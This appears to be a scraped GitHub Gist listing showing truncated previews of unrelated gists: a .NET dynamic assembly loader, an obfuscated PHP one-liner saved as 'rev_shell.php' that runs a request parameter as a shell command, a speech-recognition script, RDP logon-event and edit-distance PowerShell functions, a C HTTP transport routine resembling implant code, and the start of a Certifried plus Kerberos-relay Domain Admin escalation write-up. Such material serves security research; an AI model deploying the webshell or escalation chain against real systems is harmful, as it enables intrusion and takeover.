This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// DynamicAssemblyLoader: A DotNet Assembly Loader using a Dynamic Method and Emitted MSIL Instructions | |
// Author: @bohops | |
// | |
// "Normal" Implementation: | |
/* | |
Assembly assembly = Assembly.Load(assemblyBytes); | |
assembly.EntryPoint.Invoke(obj, objArr); | |
*/ | |
// Original author is @bohops |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
/* | |
* In terminal: | |
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
* This is how the code will be produced, \xa0\xb8\xba\xab will be | |
* treated as constant therefore no " needed. It is also not copyable | |
* string because of non-ascii characters | |
* | |
* Explanation: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#pip install git+https://github.com/huggingface/transformers.git | |
import datetime | |
import sys | |
from transformers import pipeline | |
from transformers.pipelines.audio_utils import ffmpeg_microphone_live | |
pipe = pipeline("automatic-speech-recognition", model="openai/whisper-base", device=0) | |
sampling_rate = pipe.feature_extractor.sampling_rate |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-RdpLogonEvent | |
{ | |
[CmdletBinding()] | |
param( | |
[Int32] $Last = 10 | |
) | |
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{ | |
LogName='Security' | |
ProviderName='Microsoft-Windows-Security-Auditing' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize ) | |
{ | |
#ifdef TRANSPORT_HTTP | |
HANDLE hConnect = NULL; | |
HANDLE hSession = NULL; | |
HANDLE hRequest = NULL; | |
DWORD HttpFlags = 0; | |
LPVOID RespBuffer = NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function ContextualEditDistance | |
{ | |
<# | |
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.600.3601&rep=rep1&type=pdf | |
https://github.com/chrislit/abydos/blob/344346a5fceb6acc631b3d24e16b73a303cece2c/abydos/distance/_higuera_mico.py | |
#> | |
[CmdletBinding()] | |
param( | |
[string] |
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
NewerOlder